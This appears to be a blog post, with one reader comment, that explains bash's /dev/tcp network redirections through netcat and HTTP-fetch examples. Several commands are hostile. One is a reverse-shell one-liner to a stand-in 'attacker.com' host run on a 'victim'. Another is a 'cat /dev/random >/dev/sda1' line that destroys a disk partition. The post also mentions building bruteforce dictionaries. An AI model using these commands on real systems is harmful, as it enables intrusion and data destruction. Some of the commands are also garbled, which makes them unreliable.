/bin/bash Phone Home

ET Phone HomeI found UNIX a wonderful OS, whatever the flavors! I use it for 17 years and almost every week, I learn new stuffs. One of the particularities of UNIX is the way it communicate with devices. Except some specific devices, most of them are managed and visible as files or pseudo-files within the file system hierarchy. This is known as “everything’s a file“. Examples: /dev/null, /dev/random, /dev/stdin, /dev/stdout, /proc, etc. Some of those devices are always linked to the same file descriptor (or “FD“). stdin is “0”, stdout is “1” and stderr is “2”. Most devices accept standard system-calls like open(), clos(), read() an write(). Another particularity of UNIX is the primary user interface: the shell. There are plenty of shells; some of them are more oriented to developers, to high-skilled users etc. One of them is called “bash” and is available on most of the UNIX flavors, often as the default one. Most commands executed from your shell can take their input and output via pseudo files. Examples:

  bash# cat /dev/random >/dev/sda1
  bash# tar cvf archive.tar . >/dev/null
  bash# dd if=/dev/zero of=bigfile count=1000000

Very convenient! But bash implements something very interesting: the network redirections. It understands the following pseudo files: “/dev/tcp/host/port” and “/dev/udp/host/port“. An example?

First, we need to setup a “listener” on the destination host (192.168.1.10). netcat is your best friend:

  root@destination# nc -l -p 8888

On the source host, bash will send packets to the listener:

  root@source# bash -c "echo Hello World" >/dev/tcp/192.168.1.10/8888

The listener will display:

  root@destination# nc -l -p 8888
  Hello World
  root@destination#

Now the question will arise: when those network redirection could be helpful? First, bash can used without third party tools to grab data from the network. The example below fetch this blog main page:

  exec 5<> /dev/tcp/blog.rootshell.be/80
  printf "GET / HTTP/1.0nn" >&5
  cat <&5
  exec 5>&-

Very convenient if you don’t have link or curl installed. Just pipe the output to other commands. This can be used to generate dictionary files to conduct a bruteforce attack:

  exec 5<> /dev/tcp/blog.rootshell.be/80
  printf "GET / HTTP/1.0nn" >&5
  cat <&5
  exec 5>&- | sed -e 's/<[!a-zA-Z/][^>]*>//g' foo.tmp | tr " " "n"

Another nice example is to make bash “phone home”. Let’s launch a reverse shell to an attacker box:

  victim# bash 0</dev/tcp/www.attacker.com/8888 1>&0 2>&0

As the bash shell is very common, it can be very interesting! Just use your imagination. to find other examples. A final remark: this feature is not available on all pre-compiled or packaged bash instances! Some UNIX flavors consider it as dangerous (which is true!). If you want to compile your own bash with this feature enabled, the configuration flag is “–enable-net-redirections“.

One comment

  1. Hello! I read your blog regularly and I believe it is awesome!

    Just a note to this post:

    Tested in Ubuntu 10.04 LTS : bash from the packets is compiled with “–enable-net-redirections“

    Also, for nc to listen on a specific port ,I believe you have to write “nc -l 8888”

    Have a nice day,
    Dan

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.